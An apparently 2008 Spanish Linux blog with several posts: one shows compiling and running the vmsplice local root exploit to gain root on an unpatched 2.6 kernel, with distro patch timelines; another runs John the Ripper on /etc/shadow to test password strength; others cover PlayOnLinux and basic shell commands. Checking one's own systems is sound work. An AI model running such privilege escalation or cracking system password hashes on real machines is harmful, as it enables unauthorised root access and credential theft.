Vulnerabilidad en Linux – Kernel 2.6.x – 2.6.24.1

Standard

Como muchos ya saben, se ha descubierto una grave vulnerabilidad en el kernel linux (2.6.x – 2.6.24.1) que permite a un usuario con acceso local obtener privilegios de root ejecutando un simple exploit.

Si queréis poder dedicar un minuto a jugar un poco con el exploit para comprobar por uno mismo si afecta a nuestra distribución. Para ello basta descargar el código fuente del exploit (y aquí otra variante), compilarlo y ejecutarlo como usuario normal. A continuacion las acciones:

zarpele@makid:~$ uname -r
2.6.22-3-686

zarpele@makid:~/Desktop$ gcc exploit.c -o exploit
zarpele@makid:~/Desktop$ whoami
zarpele
zarpele@makid:~/Desktop$ ./exploit
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7dd2000 .. 0xb7e04000
[+] root
root@makid:~/Desktop#

Casi tan pasmosa como la efectividad del exploit es la sencillez del parche que lo soluciona.
Ya hay nueva versión del kernel (2.6.24.2) con el bug resuelto.
Esto es importante ya que dispones de un ciber con este kernel cualquier usuario podria acceder como root y hacer lo que quiera!!!.

DistroWatch hace un resumen de la rapidez con que las principales distribuciones GNU/Linux respondieron publicando sus correcciones al problema. Todas las 10 primeras distribuciones reaccionaron en menos de 48 horas:

Distribution Date/Time Delay Reference
Debian GNU/Linux 2008-02-11 13:58 +0 hours DSA 1494-1
Fedora 2008-02-11 22:39 +8 hours FEDORA-2008-1423
Slackware Linux 2008-02-12 02:00 +12 hours SSA:2008-042-01
Mandriva Linux 2008-02-12 07:06 +19 hours MDVSA-2008:043
Frugalware Linux 2008-02-12 11:17 +21 hours FSA-369
openSUSE 2008-02-12 12:43 +23 hours SUSE-SA:2008:007
rPath Linux 2008-02-12 16:28 +26 hours rPSA-2008-0052-1
Red Hat Enterprise Linux 2008-02-12 16:54 +27 hours RHSA-2008:0129-01
Ubuntu 2008-02-12 17:23 +27 hours USN-577-1
CentOS 2008-02-13 03:27 +37 hours CESA-2008:0129

Saludos…

Fuente: DistroWatch, BraiaNet

PlayOnLinux Juegos de Windows en Linux

Standard

¿Qué es PlayOnLinux?

PlayOnLinux es un script escrito en bash, que utiliza el Wine (http://www.winehq.org/). El objetivo de Wine es instalar y ejecutar en una distribución de Linux software que está diseñado para Microsoft Windows.

PlayOnLinux ¿Cuál es el objetivo?

Después de usar Wine nos dimos cuenta de que a veces necesita de complejos comandos. PlayOnLinux ayuda a suavizar esos comandos y hacer su vida más fácil en el mundo Linux.

Más, algunas personas que se preocupan por sus propios juegos que no vendrá a Linux simplemente porque quieren tener la posibilidad de jugar de nuevo. Nuestro script los ayudará a moverse en Linux.

¿Puedo instalar todos los juegos que corran bajo Windows?

Depende. Si el juego está en la lista usted puede encontrar allí: http://www.playonlinux.com/scripts/show_repository.php

http://www.playonlinux.com/es/scripts.html

, puede confiar en la compatibilidad con el sistema operativo Linux.

Si no está en la lista, usted tiene que comprobar si funciona bien con Wine (comprobar que aquí: http://appdb.winehq.org/). Si lo hace funcionar con Wine, puede utilizar “Liveinstall” opción que está disponible en el script.

Si no es así, puede que tenga que esperar a que el juego sea configurado correctamente ..

Saludos Linuexeros…

Comandos Interesantes en Linux

Standard

Hola gente debido a mi desorden de archivos de texto con algun que comando guardado para saber que hacia (no puedo guardarlo todo en la cabeza), decidi hacer un post con los comandos mas utilizados por mi y los mas interesantes. Si tenes alguno pasalo!!!

Descarga completa de Web

Es posible descargar una web completa y todos sus elementos (salvo algunas páginas protegidas o realizadas en Flash) usando la aplicación wget.
Para ello, teclear

“wget -r http://www.zarpele.com.ar”

Si lo que se tiene es un fichero con un listado de webs, con el siguiente comando se descargan todas:

“wget -r -i archivodelaswebs.txt”

Encontrar el proceso que consume mas memoria:

Aveces no sabemos cual es el proceso que ocupa mas memoria y rentaliza nuestro sistema operativo. Con este comando podremos eliminarlo o tratar de arreglarlo de alguna manera.

“ps aux | sort +5n”

Borrar texto en consola:

En ocasiones cuando utilizamos la consola tantas lineas nos empiezan a traer dolores de cabeza por eso con el siguiente comando:

“clear”

Eliminaremos los comandos utilizados anteriormente (cls equivalente a Win32)

Reunir varios archivos en uno solo:

La utilidad “tar” le da esta opción. “tar” nace de “tape archive”, y aún es utilizada para reunir varios archivos en uno sólo. Para crear un archivo tar, ingrese el comando:

“tar cvf archivo.tar nombredirectorio”

Esto copiara todos los archivos de un directorio en un sólo archivo, que recibirá el nombre de “archivo.tar”. Para comprimirlo, utilice el comando:

“gzip archive.tar”

Extraer archivos desde un archivo .tar:

Ejecute el comando:

“tar xvf nombredearchivo.tar”

Si el archivo tiene el sufijo .gz, o es un archivo .tgx, Ud. necesitará añadir la opción “z”, que primero descomprime el archivo. El comando vendría a ser:

“tar xvfz archivo.tar”

Enviar mensajes colectivos:

Atraves del comando wall (write all) podemos enviar mensajes colectivos a los demas usuarios, siendo uno administrador obviamente

“wall mensaje”

ej:

“wall El sistema se reiniciara en 60 segundos”

Buscar archivos rápidamente en consola:

Para acceder a ésta aplicación simplemente tipeamos “locate” en el prompt de cualquier terminal. Nos dará una breve reseña de que parámetros necesitamos para poder utilizarlo.
Por ejemplo, si para encontrar el archivo “linux-2.2.19.tar.gz”, la sintaxis seria la siguiente:

“locate linux-2.2.19.tar.gz”

Si queremos enterarnos de todas las posibilidades de búsqueda que ofrece locate, nada mejor que utilizar el manual en línea. Para ello solo debemos tipear:

“man locate”

La combinacion “man comando” puede ser utilizada para cualquier comando. Pruebese por ejemplo “man ps”, sino como ustedes ya lo sabran “comando –help” ayuda del comando.

Ejecución de programas en el inicio:

Es posible hacer que el sistema ejecute un comando o un programa cada vez que se inicia el sistema.
Esto es muy útil para levantar dispositivos de hardware, por para ejecutar comandos de configuración rutinarios. Todo lo que tienen que hacer es agregar el comando que quieren que se ejecute a la última línea del archivo /etc/rc.d/rc.local. Este es un archivo de texto que podemos editar con cualquier editor. Sólo agreguen el comando a la última línea de éste archivo y reinicien el sistema. El comando se ejecutará automáticamente cada vez que se inicie el sistema.

“sudo gedit /etc/rc.d/rc.local”

Si nuestro editor de texto en Gedit el editor default de gnome.

Cómo ver archivos comprimidos (archivos de texto):

Para visualizar un archivo comprimido con gzip, podemos utilizar los comandos zless o zmore. Estos nos permitirán abrir el archivo directamente, sin necesidad de descomprimirlo antes. Aclaramos que es útil sólo cuando sabemos que el archivo comprimido es un archivo de texto.

Nombres muy largos (TAB):

Una particularidad de Linux (como en todos los sistemas basados en UNIX) es que los archivos suelen tener nombres muy largos. Pasarlos como parámetros puede volverse complicado cuando no lo s recordamos de memoria. Por eso el shell Bash nos ofrece su función de autocompletado, mediante la cual, al escribir las primeras letras del nombre y presionar TAB, Bash mostrará las coincidencias; esto nos evitará el engorro de tipear el nombre completo del archivo.

Y como ultimo comando les recomiendo apropos cuando no se acuerda como era el comando pero saben lo que hacia.

“apropos delete”

La shell nos devolvera todos los comandos relacionados con delete.

Saludos…
Continuara…

Que resistente es tu contraseña Linuxera???

Standard

Hola gente, tengo medio abandonado este blog por motivos de estudio les prometo cuando termine me pondre las pilas (se viene un server con wordpress mas adelante), Hoy les traigo una pequeña pero importante aplicacion. Para instalar el paquete solo escribir en terminal:


sudo apt-get install john

Luego para ejecutarla:

sudo john /etc/shadow

A medida que presionan escape les dara la combinacion que esta actualmente crackeando(imagen).

Mi contraseña le llevo al crackeador 6 horas y media aproximadamente como pueden ver.

Para mas Info –> John the Ripper

50 VideoTutoriales de Linux

Standard

Hola dando vuelta por la red me topo con estos VideosTutoriales muy buenos, asi que si tienen un poco de tiempo pueden hecharle un ojo

DOWNLOAD (DESCARGAR) VideoTutoriales de Linux
PASSWORD: Visual.SaC

Saludos…

Fuente

4 Wallpapers Linux Mint

Standard

Hola gente hoy me puse a buscar unos wallpapers de mi querido sistema operativos LinuxMint y encontre muy escasos asi que con mi poca experiencia con photoshop hice estos 5 humildes wallpapers, luego les traere algunos hechos en el Gimp. Si no ven bien las imagenes hagan click sobre ella o mandenme un mail y se las mando sin cuidado.

Saludos…